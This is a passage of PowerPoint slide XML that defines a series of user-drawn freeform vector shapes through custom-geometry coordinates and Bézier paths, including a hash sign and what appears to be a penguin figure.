              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2152"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Freeform 197"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="23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Freeform 198"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2497"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Freeform 199"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2692"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Freeform 200"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2890"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Freeform 201"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3032" y="3298"/>
                <a:ext cx="77"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6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Freeform 202"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3140" y="3298"/>
                <a:ext cx="77" cy="293"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 64 w 64"/>
                  <a:gd name="T1" fmla="*/ 128 h 240"/>
                  <a:gd name="T2" fmla="*/ 42 w 64"/>
                  <a:gd name="T3" fmla="*/ 157 h 240"/>
                  <a:gd name="T4" fmla="*/ 42 w 64"/>
                  <a:gd name="T5" fmla="*/ 198 h 240"/>
                  <a:gd name="T6" fmla="*/ 0 w 64"/>
                  <a:gd name="T7" fmla="*/ 240 h 240"/>
                  <a:gd name="T8" fmla="*/ 0 w 64"/>
                  <a:gd name="T9" fmla="*/ 223 h 240"/>
                  <a:gd name="T10" fmla="*/ 17 w 64"/>
                  <a:gd name="T11" fmla="*/ 216 h 240"/>
                  <a:gd name="T12" fmla="*/ 22 w 64"/>
                  <a:gd name="T13" fmla="*/ 195 h 240"/>
                  <a:gd name="T14" fmla="*/ 22 w 64"/>
                  <a:gd name="T15" fmla="*/ 155 h 240"/>
                  <a:gd name="T16" fmla="*/ 43 w 64"/>
                  <a:gd name="T17" fmla="*/ 120 h 240"/>
                  <a:gd name="T18" fmla="*/ 43 w 64"/>
                  <a:gd name="T19" fmla="*/ 120 h 240"/>
                  <a:gd name="T20" fmla="*/ 22 w 64"/>
                  <a:gd name="T21" fmla="*/ 84 h 240"/>
                  <a:gd name="T22" fmla="*/ 22 w 64"/>
                  <a:gd name="T23" fmla="*/ 44 h 240"/>
                  <a:gd name="T24" fmla="*/ 0 w 64"/>
                  <a:gd name="T25" fmla="*/ 17 h 240"/>
                  <a:gd name="T26" fmla="*/ 0 w 64"/>
                  <a:gd name="T27" fmla="*/ 0 h 240"/>
                  <a:gd name="T28" fmla="*/ 42 w 64"/>
                  <a:gd name="T29" fmla="*/ 43 h 240"/>
                  <a:gd name="T30" fmla="*/ 42 w 64"/>
                  <a:gd name="T31" fmla="*/ 83 h 240"/>
                  <a:gd name="T32" fmla="*/ 64 w 64"/>
                  <a:gd name="T33" fmla="*/ 112 h 240"/>
                  <a:gd name="T34" fmla="*/ 64 w 64"/>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128"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="129"/>
                      <a:pt x="42" y="139"/>
                      <a:pt x="42" y="157"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="198"/>
                      <a:pt x="42" y="198"/>
                      <a:pt x="42" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="226"/>
                      <a:pt x="28" y="240"/>
                      <a:pt x="0" y="240"/>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4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="44"/>
                      <a:pt x="22" y="44"/>
                      <a:pt x="22" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="27"/>
                      <a:pt x="15" y="18"/>
                      <a:pt x="0" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="0"/>
                      <a:pt x="42" y="14"/>
                      <a:pt x="42" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="83"/>
                      <a:pt x="42" y="83"/>
                      <a:pt x="42" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="101"/>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Freeform 203"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3248"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1" y="7"/>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Freeform 204"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3395"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Freeform 205"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3590" y="3294"/>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1"/>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Freeform 206"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3788"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Freeform 207"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3938"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Freeform 208"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4085"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Freeform 209"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4284" y="3292"/>
                <a:ext cx="82"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Freeform 210"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4433" y="3292"/>
                <a:ext cx="82"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Freeform 211"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4581"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Freeform 212"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4779"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Freeform 213"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4926"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Freeform 214"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5125"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Freeform 215"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5261" y="3298"/>
                <a:ext cx="188" cy="218"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 188 w 188"/>
                  <a:gd name="T1" fmla="*/ 67 h 218"/>
                  <a:gd name="T2" fmla="*/ 184 w 188"/>
                  <a:gd name="T3" fmla="*/ 84 h 218"/>
                  <a:gd name="T4" fmla="*/ 142 w 188"/>
                  <a:gd name="T5" fmla="*/ 84 h 218"/>
                  <a:gd name="T6" fmla="*/ 131 w 188"/>
                  <a:gd name="T7" fmla="*/ 134 h 218"/>
                  <a:gd name="T8" fmla="*/ 177 w 188"/>
                  <a:gd name="T9" fmla="*/ 134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4 h 218"/>
                  <a:gd name="T32" fmla="*/ 48 w 188"/>
                  <a:gd name="T33" fmla="*/ 134 h 218"/>
                  <a:gd name="T34" fmla="*/ 58 w 188"/>
                  <a:gd name="T35" fmla="*/ 84 h 218"/>
                  <a:gd name="T36" fmla="*/ 11 w 188"/>
                  <a:gd name="T37" fmla="*/ 84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4 h 218"/>
                  <a:gd name="T60" fmla="*/ 78 w 188"/>
                  <a:gd name="T61" fmla="*/ 84 h 218"/>
                  <a:gd name="T62" fmla="*/ 67 w 188"/>
                  <a:gd name="T63" fmla="*/ 134 h 218"/>
                  <a:gd name="T64" fmla="*/ 110 w 188"/>
                  <a:gd name="T65" fmla="*/ 134 h 218"/>
                  <a:gd name="T66" fmla="*/ 121 w 188"/>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4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188"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Freeform 216"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5478"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0" name="Freeform 217"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5904" y="3292"/>
                <a:ext cx="82"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419"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1951" y="0"/>
              <a:ext cx="5890" cy="3541"/>
              <a:chOff x="1951" y="0"/>
              <a:chExt cx="5890" cy="3541"/>
            </a:xfrm>
            <a:grpFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1349" name="Freeform 219"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6051" y="3294"/>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1"/>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220"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6250" y="3292"/>
                <a:ext cx="81" cy="245"/>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2"/>
                      <a:pt x="31" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="16"/>
                      <a:pt x="42" y="13"/>
                      <a:pt x="47" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="7"/>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221"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="639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222"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6547"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223"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6744"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Freeform 224"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6893"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225"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7043" y="3292"/>
                <a:ext cx="83" cy="245"/>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6"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Freeform 226"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7192" y="3292"/>
                <a:ext cx="83" cy="245"/>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1" y="29"/>
                      <a:pt x="16" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="24"/>
                      <a:pt x="27" y="22"/>
                      <a:pt x="32" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="16"/>
                      <a:pt x="43" y="13"/>
                      <a:pt x="47" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="7"/>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227"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7340" y="3294"/>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3"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228"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7538" y="3292"/>
                <a:ext cx="83" cy="245"/>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4"/>
                      <a:pt x="0" y="55"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="32"/>
                      <a:pt x="0" y="32"/>
                      <a:pt x="0" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="31"/>
                      <a:pt x="10" y="29"/>
                      <a:pt x="16" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="24"/>
                      <a:pt x="27" y="22"/>
                      <a:pt x="32" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="16"/>
                      <a:pt x="42" y="13"/>
                      <a:pt x="47" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="7"/>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229"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7686" y="3294"/>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5" y="184"/>
                      <a:pt x="98" y="191"/>
                      <a:pt x="89" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="200"/>
                      <a:pt x="72" y="202"/>
                      <a:pt x="62" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="202"/>
                      <a:pt x="43" y="200"/>
                      <a:pt x="35" y="196"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="191"/>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230"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5672" y="3284"/>
                <a:ext cx="218" cy="256"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 175 w 179"/>
                  <a:gd name="T1" fmla="*/ 174 h 209"/>
                  <a:gd name="T2" fmla="*/ 134 w 179"/>
                  <a:gd name="T3" fmla="*/ 209 h 209"/>
                  <a:gd name="T4" fmla="*/ 81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2 w 179"/>
                  <a:gd name="T23" fmla="*/ 84 h 209"/>
                  <a:gd name="T24" fmla="*/ 58 w 179"/>
                  <a:gd name="T25" fmla="*/ 28 h 209"/>
                  <a:gd name="T26" fmla="*/ 117 w 179"/>
                  <a:gd name="T27" fmla="*/ 18 h 209"/>
                  <a:gd name="T28" fmla="*/ 159 w 179"/>
                  <a:gd name="T29" fmla="*/ 129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7 w 179"/>
                  <a:gd name="T85" fmla="*/ 42 h 209"/>
                  <a:gd name="T86" fmla="*/ 78 w 179"/>
                  <a:gd name="T87" fmla="*/ 44 h 209"/>
                  <a:gd name="T88" fmla="*/ 66 w 179"/>
                  <a:gd name="T89" fmla="*/ 35 h 209"/>
                  <a:gd name="T90" fmla="*/ 67 w 179"/>
                  <a:gd name="T91" fmla="*/ 48 h 209"/>
                  <a:gd name="T92" fmla="*/ 73 w 179"/>
                  <a:gd name="T93" fmla="*/ 48 h 209"/>
                  <a:gd name="T94" fmla="*/ 65 w 179"/>
                  <a:gd name="T95" fmla="*/ 60 h 209"/>
                  <a:gd name="T96" fmla="*/ 101 w 179"/>
                  <a:gd name="T97" fmla="*/ 59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9"/>
                      <a:pt x="134" y="209"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="209"/>
                      <a:pt x="128" y="209"/>
                      <a:pt x="125" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="208"/>
                      <a:pt x="119" y="206"/>
                      <a:pt x="118" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116" y="200"/>
                      <a:pt x="113" y="198"/>
                      <a:pt x="110" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="198"/>
                      <a:pt x="90" y="199"/>
                      <a:pt x="81" y="199"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="199"/>
                      <a:pt x="72" y="200"/>
                      <a:pt x="68" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="203"/>
                      <a:pt x="64" y="204"/>
                      <a:pt x="63" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="209"/>
                      <a:pt x="54" y="209"/>
                      <a:pt x="48" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="206"/>
                      <a:pt x="38" y="204"/>
                      <a:pt x="32" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="200"/>
                      <a:pt x="18" y="199"/>
                      <a:pt x="11" y="198"/>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10" y="160"/>
                      <a:pt x="12" y="160"/>
                      <a:pt x="14" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="159"/>
                      <a:pt x="22" y="155"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="153"/>
                      <a:pt x="23" y="160"/>
                      <a:pt x="17" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="163"/>
                      <a:pt x="12" y="163"/>
                      <a:pt x="9" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="163"/>
                      <a:pt x="9" y="163"/>
                      <a:pt x="9" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="162"/>
                      <a:pt x="3" y="164"/>
                      <a:pt x="4" y="168"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="170"/>
                      <a:pt x="6" y="171"/>
                      <a:pt x="6" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="176"/>
                      <a:pt x="8" y="180"/>
                      <a:pt x="6" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="185"/>
                      <a:pt x="5" y="187"/>
                      <a:pt x="4" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="190"/>
                      <a:pt x="4" y="192"/>
                      <a:pt x="7" y="193"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="194"/>
                      <a:pt x="11" y="194"/>
                      <a:pt x="13" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="197"/>
                      <a:pt x="35" y="199"/>
                      <a:pt x="45" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="204"/>
                      <a:pt x="52" y="204"/>
                      <a:pt x="55" y="204"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="202"/>
                      <a:pt x="66" y="198"/>
                      <a:pt x="65" y="190"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="186"/>
                      <a:pt x="62" y="182"/>
                      <a:pt x="60" y="179"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="170"/>
                      <a:pt x="49" y="161"/>
                      <a:pt x="42" y="153"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="150"/>
                      <a:pt x="37" y="147"/>
                      <a:pt x="35" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="143"/>
                      <a:pt x="29" y="143"/>
                      <a:pt x="27" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="145"/>
                      <a:pt x="25" y="145"/>
                      <a:pt x="25" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="141"/>
                      <a:pt x="24" y="137"/>
                      <a:pt x="25" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="133"/>
                      <a:pt x="26" y="132"/>
                      <a:pt x="27" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="125"/>
                      <a:pt x="32" y="119"/>
                      <a:pt x="35" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="106"/>
                      <a:pt x="39" y="100"/>
                      <a:pt x="43" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="91"/>
                      <a:pt x="49" y="87"/>
                      <a:pt x="52" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="80"/>
                      <a:pt x="56" y="77"/>
                      <a:pt x="58" y="74"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="71"/>
                      <a:pt x="60" y="68"/>
                      <a:pt x="60" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="58"/>
                      <a:pt x="59" y="51"/>
                      <a:pt x="59" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="39"/>
                      <a:pt x="58" y="33"/>
                      <a:pt x="58" y="28"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="17"/>
                      <a:pt x="63" y="8"/>
                      <a:pt x="73" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="1"/>
                      <a:pt x="81" y="1"/>
                      <a:pt x="85" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="0"/>
                      <a:pt x="97" y="1"/>
                      <a:pt x="102" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="109" y="6"/>
                      <a:pt x="114" y="12"/>
                      <a:pt x="117" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="24"/>
                      <a:pt x="122" y="30"/>
                      <a:pt x="122" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="40"/>
                      <a:pt x="122" y="44"/>
                      <a:pt x="123" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="124" y="62"/>
                      <a:pt x="128" y="75"/>
                      <a:pt x="138" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="97"/>
                      <a:pt x="156" y="112"/>
                      <a:pt x="159" y="129"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="161" y="134"/>
                      <a:pt x="161" y="139"/>
                      <a:pt x="160" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160"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50"/>
                      <a:pt x="126" y="148"/>
                      <a:pt x="125" y="148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="148"/>
                      <a:pt x="122" y="150"/>
                      <a:pt x="121" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="156"/>
                      <a:pt x="120" y="160"/>
                      <a:pt x="121" y="164"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="171"/>
                      <a:pt x="123" y="179"/>
                      <a:pt x="122" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="189"/>
                      <a:pt x="121" y="192"/>
                      <a:pt x="122" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="202"/>
                      <a:pt x="129" y="205"/>
                      <a:pt x="136" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="202"/>
                      <a:pt x="142" y="200"/>
                      <a:pt x="144" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="192"/>
                      <a:pt x="158" y="189"/>
                      <a:pt x="165" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="186"/>
                      <a:pt x="170" y="184"/>
                      <a:pt x="173" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="183"/>
                      <a:pt x="174" y="182"/>
                      <a:pt x="175" y="181"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="176" y="180"/>
                      <a:pt x="176" y="178"/>
                      <a:pt x="175" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="176"/>
                      <a:pt x="172" y="175"/>
                      <a:pt x="171" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="170" y="174"/>
                      <a:pt x="169" y="173"/>
                      <a:pt x="168" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="163" y="172"/>
                      <a:pt x="161" y="168"/>
                      <a:pt x="160" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="161"/>
                      <a:pt x="160" y="158"/>
                      <a:pt x="160" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="155"/>
